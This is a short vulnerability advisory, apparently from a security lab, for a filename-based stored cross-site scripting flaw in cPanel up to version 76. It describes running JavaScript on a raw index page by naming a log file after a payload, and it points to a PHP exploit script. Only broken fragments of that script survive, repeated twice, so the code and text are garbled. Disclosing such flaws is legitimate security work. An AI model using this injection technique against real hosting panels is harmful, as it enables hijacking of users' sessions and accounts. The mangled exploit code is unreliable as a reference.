[+] Title: cPanel Filename Based Stored XSS <= v76 [+] Author: Numan OZDEMIR [+] Vendor Homepage: cpanel.com [+] Version: Up to v76. [+] Discovered by Numan OZDEMIR in InfinitumIT Labs [+] root@numanozdemir.com - info@infinitumit.com.tr [~] Description: Attacker can run JavaScript codes on this page: http://ip:2082/cpsessXXXXXXXXXX/frontend/THEME/raw/index.html [~] How to Reproduce: Create a file as named with your payload in /home/user/logs directory or run this php exploit:
http://ip:2082/cpsessXXXXXXXXXX/frontend/THEME/raw/index.html '); }else{ die('An error occured.'); } }else{ echo 'Enter your payload:
'; } // end of the script. ?> Note: You cant create a file as named with / (slash) character by this exploit. This vulnerability is disclosed by cPanel Team's confirmation. // for secure days...
http://ip:2082/cpsessXXXXXXXXXX/frontend/THEME/raw/index.html '); }else{ die('An error occured.'); } }else{ echo 'Enter your payload:
'; } // end of the script. ?>